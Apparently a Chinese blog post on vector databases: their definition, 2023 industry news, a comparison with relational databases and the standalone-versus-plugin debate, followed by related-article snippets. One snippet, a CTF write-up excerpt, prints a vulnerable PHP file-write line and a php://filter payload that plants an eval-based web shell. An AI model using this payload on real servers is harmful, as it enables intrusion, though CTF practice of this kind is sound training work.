云卷云舒:独立式向量数据库?数据库向量式插件?

云卷云舒:算力网络+云原生(下):云数据库发展的新篇章-CSDN博客https://blog.csdn.net/bishenghua/article/details/135050556

圈内人都知道,2023 年是向量数据库的元年,最初起源于 2023年3月英伟达的黄仁勋在 GTC 大会上提出的这个概念,后续一炮走红,研发潮、投资潮随之而来。

一、向量数据库定义

在传统的关系型数据库中,数据是以表格的形式存储的,而在向量数据库中,数据则是以向量的形式存储的。这种新型的数据库技术,能够更有效地处理和分析大数据,因此在大数据时代中受到了广泛的关注和应用。随着AI 应用的大规模落地普及,数据量得到了暴涨,数据复杂度也大幅提升,数据库需要提高对向量分析和 AI 应用的支持能力。所以向量数据库也是人工智能与数据库结合发展的一个趋势。多模能力(包括向量检索)让应用可以把结构化数据和非结构化数据统一处理,所以说向量数据库也是“数据库一体化”发展的一个体现

二、行业动态

  1. 2023年6月,九章云极 DataCanvas 将 DingoDB 升级为多模向量数据库,并已于去年开源。
  2. 7 月 4 日,腾讯云发布 AI 原生向量数据库。
  3. 11 月 15 日,中国信通院联合腾讯云计算(北京)有限责任公司、中移(苏州)软件技术有限公司、北京枫清科技有限公司(Fabarta)等多家企业共同编制的、国内首个向量数据库标准正式发布。

三、技术场景分析

 向量数据库专注于存储和处理向量数据,并提供高效的向量搜索和相似性匹配功能。这种数据库的出现是为了满足越来越多应用场景对于高维度数据和向量计算的需求

各数据库厂商和研究机构都在致力于改进向量数据库的算法和架构,以提高其处理大规模数据的能力。而且,根据黄仁勋的说法,英伟达将推出一个新的 RAFT库,用于加速索引、数据加载和近邻检索,并考虑将 RAFT 的加速引入到Milvus 开源向量数据库和Redis里面。有了巨头们的技术和资金支持,向量数据库的市场空间相信会十分巨大,国内就有机构预估,到 2030 年,全球向量数据库市场规模将达到 500 亿美元。

随着大数据和人工智能的快速发展,越来越多的应用和场景需要处理和分析向量数据,差异化的设计优势主要体现在提供向量和关系型数据库的混合检索能力。凭借解决了传统数据库单纯关系型检索的弊端,快速的赢得技术行业和投资高手们的青睐,认为发展前景喜人。

四、两种形态

向量数据库的两种形态:

第一种传统数据库上加上一个向量检索的插件;

第二种独立的企业级向量数据库。

1、声音一:独立演进

行业的调研提及到,更多的是在原来传统数据库上增加了一项向量检索能力,也就是第一种形态。

我们姑且从数据存储方式、数据容量级、查询原理、算力要求四个维度分析,如下图

 传统数据库向量数据库
数据存储结构化数据非结构化数据转换为向量存储
数据容量千万级,百万级最佳至少百亿级,甚至千亿
查询原理精准“匹配式”,结果准确近似查询,结果返回多
算力要求理论上偏线性近似计算势必需要大规模算力,属于计算密集型

总结来说,向量数据库的主要特点是能够高效地存储和查询大规模的向量数据,通常基于向量相似度的查询和检索,对于维度越高、信息规模越庞大,效果越好。

2、声音二:插件化演进

当然也有很多人认为,向量数据库会弱化为数据库的向量索引,与数据库集成起来推出服务,主要理由有以下几点:

  • 向量数据库的核心是向量索引,正式索引能力的一种升级而已。
  • 向量数据库,首先得是数据库,同样需要处理数据安全、副本管理、容灾等问题,这些能力对于向量数据库来说,重新配备的成本巨大,有必要吗?
  • 除了大模型之外,大多的业务场景下,需要查询的数据类型肯定是结合的,关系型、非关系型、向量型结合来的,单纯的向量数据库难以单独推出满足大范围推广的需求。

所以,从以上三个角度来看,传统数据库集成向量索引特性,是一个大的趋势,在可以预见的未来更多的产品也将支持插件式向量能力。

 

五、向量数据库的发展趋势预测

1、正如前面所说,向量数据库的快速发展,不可避免的需要尽快的解决和各类型传统数据库的兼容集成、安全与管理能提升等;

2、在大模型快速发展的今天,强大的市场需求的磨练下,向量数据库势必会不断创新、推陈出新,成熟度会越发完善,同时近似查询的查询原理,在保证算力资源的前提下,不断提升近似坚实的精准性,在算力和效能之间不断平衡。

欢迎投票:

推荐:云卷云舒:AI for DB、DB for AI-CSDN博客

 

 

 

 

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:/a/320450.html

如若内容造成侵权/违法违规/事实不符,请联系我们进行投诉反馈qq邮箱809451989@qq.com,一经查实,立即删除!

相关文章

分布式链路追踪专栏,分布式链路追踪:Skywalking集群管理设计

SkyWalking 是一个开源 APM 系统,包括针对 Cloud Native 体系结构中的分布式系统的监视,跟踪,诊断功能。核心功能如下: 服务、服务实例、端点指标分析; 根本原因分析,在运行时分析代码; 服务拓…

本地一键部署grafana+prometheus

本地k8s集群内一键部署grafanaprometheus 说明: 此一键部署grafanaPrometheus已包含: victoria-metrics 存储prometheus-servergrafanaprometheus-kube-state-metricsprometheus-node-exporterblackbox-exporter grafana内已导入基础的dashboard【7个…

PXIe-6396国产替代,8路AI(18位,14 MS/s/ch),2路A​O,24路DIO,PXI多功能I/O模块

PXIe,8路AI(18位,14 MS/s/ch),2路A​O,24路DIO,PXI多功能I/O模块 PXIe-6396是一款同步采样的多功能DAQ设备。该模块提供了模拟 I/O、数字I/O、四个32位计数器和模拟和数字触发。板载NI-STC3定时…

GAN生成对抗网络介绍

GAN简介 GAN 全称是Generative Adversarial Networks,即生成对抗网络。 “生成”表示它是一个生成模型,而“对抗”代表它的训练是处于一种对抗博弈状态中的。 一个可以自己创造数据的网络! 判别模型与生成模型 判别模型(Discr…

MobaXterm连接服务器步骤

双击该软件 选择Session 点击SSH 填写服务器的IP地址、服务器的用户名称、Port这个端口号一般都是这个,但有些可能例外,自己注意一下,最后点击OK就行 这个五角星点击一下,就可以看到您自己刚才的配置。 鼠标左键双击&…

python基础-base64编码理解

目录 1、base64是什么 2、base64有什么用 3、base64如何用 4、理解base64 5、扩展 1、base64是什么 base64 就是包括字母a-z,A-Z,数字0-9,符号“”,“/”一共64个字符的字符集;还有一个‘’ 字符,占位补充; …

【已解决】C语言进行多线程数据切割查找数据

第一次听到多线程切割,笔者也没听的太懂,但发现多线程数据切割其实就是分出多个线程,进行处理查找数据的事情。而为什么切割呢,就是因为数据不够线程数分的,假如1k个数据,7个线程,这里不能够整除…

吐血整理,性能测试重要指标+设计真实负载(详细总结)

目录:导读 前言一、Python编程入门到精通二、接口自动化项目实战三、Web自动化项目实战四、App自动化项目实战五、一线大厂简历六、测试开发DevOps体系七、常用自动化测试工具八、JMeter性能测试九、总结(尾部小惊喜) 前言 1、性能测试之重要…

初识C语言·数据存储

1 整数在内存中的存储 前面讲到,整数在计算机中的存储是以补码形式存储的,其中正数和负数也有些许差别,正数的三码相同,负数的就不相同了,那么这里就涉及原码反码补码。 原码:直接把整数用二进制的方式表…

Pandas:Python可视化神器

大家好,数据可视化可以让我们很直观的发现数据中隐藏的规律,察觉到变量之间的互动关系,可以帮助我们更好的给他人解释现象,做到一图胜千文的说明效果。 常见的数据可视化库有: matplotlib 是最常见的2维库,可以算作可…

Codeforces Round 913 (Div. 3)E 不进位各数位和与打表

Problem - E - Codeforces digsum(a)digsum(b)digsum(c)digsum(n) 要点一: 当左边和发生进位,比如56 11,那么数位和会变小。其实下一位就是相加后对9取余,各数位和必定变小的。 要点二: 然后就是组合情况了&#x…

[NAND Flash 5.5] PLC NAND 虽来但远

依公知及经验整理,原创保护,禁止转载。 专栏 《深入理解NAND Flash》 <<<< 返回总目录 <<<< 前言 图片来源: 存储随笔 2022年8月份在美国FMS峰会上,Solidigm公司(前身为Intel NAND部门)展示了全球第一款基于PLC NAND研发的SSD。这也标志着,PLC…

大模型推理优化实践:KV cache 复用与投机采样

作者&#xff1a;米基 一、背景 RTP-LLM 是阿里巴巴大模型预测团队开发的大模型推理加速引擎&#xff0c;作为一个高性能的大模型推理解决方案&#xff0c;它已被广泛应用于阿里内部。该引擎与当前广泛使用的多种主流模型兼容&#xff0c;并通过采用高性能的 CUDA 算子来实现了…

polar CTF 写shell

一、题目 <?php /*PolarD&N CTF*/highlight_file(__FILE__);file_put_contents($_GET[filename],"<?php exit();".$_POST[content]);?>二、解题 payload ?filenamephp://filter/convert.base64-decode/resourceshell.php #<?eval($_POST[1]);…

maven镜像源设置aliyun提升下载速度

一、打开pom.xml project下在添加 <repositories><repository><id>aliyunmaven</id><name>aliyun</name><url>https://maven.aliyun.com/repository/public</url></repository><repository><id>central2&l…

PriorityQueue优先队列使用的注意事项

PriorityQueue只保证队列的头和尾是指定序列的两个端点值&#xff0c;不是给它的元素排序了。 所以在使用的时候直接打印 PriorityQueue &#xff0c;或者用 增强for 遍历出来的数据都不是有序的。正确的遍历方式如下&#xff1a; // 按照排序顺序输出 PriorityQueue 中的元素…

贪心算法(思路)

最近在cf上做了很多贪心的题&#xff0c;写篇博客来总结一下 Problem - C - Codeforces 看第一道题 不难看出&#xff0c;我们需要在数组中找到一段奇偶相间的序列&#xff0c;要使他们的和最大&#xff0c; 在图中我们假设[1,2]和[3,4]是奇偶相间的序列&#xff0c;我们在在…

Asp .Net Core 系列:基于 Swashbuckle.AspNetCore 包 集成 Swagger

什么是 Swagger? Swagger 是一个规范和完整的框架&#xff0c;用于生成、描述、调用和可视化 RESTful 风格的 Web 服务。它提供了一种规范的方式来定义、构建和文档化 RESTful Web 服务&#xff0c;使客户端能够发现和理解各种服务的功能。Swagger 的目标是使部署管理和使用功…

py爬虫入门笔记(request.get的使用)

文章目录 Day11. 了解浏览器开发者工具2. Get请求http://baidu.com3. Post请求https://fanyi.baidu.com/sug4. 肯德基小作业 Day21. 正则表达式2. 使用re模块3. 爬取豆瓣电影Top250的第一页4. 爬取豆瓣电影Top250所有的250部电影信息 Day31. xpath的使用2. 认识下载照片线程池的…

算法通关村第十六关—滑动窗口与堆结合(黄金)

滑动窗口与堆结合 堆与滑动窗口问题的结合 LeetCode239给你一个整数数组nums,有一个大小为k的滑动窗口从数组的最左侧移动到数组的最右侧。你只可以看到在滑动窗口内的k个数字。滑动窗口每次只向右移动一位&#xff0c;返回滑动窗口中的最大值。  对于最大值、K个最大这种场…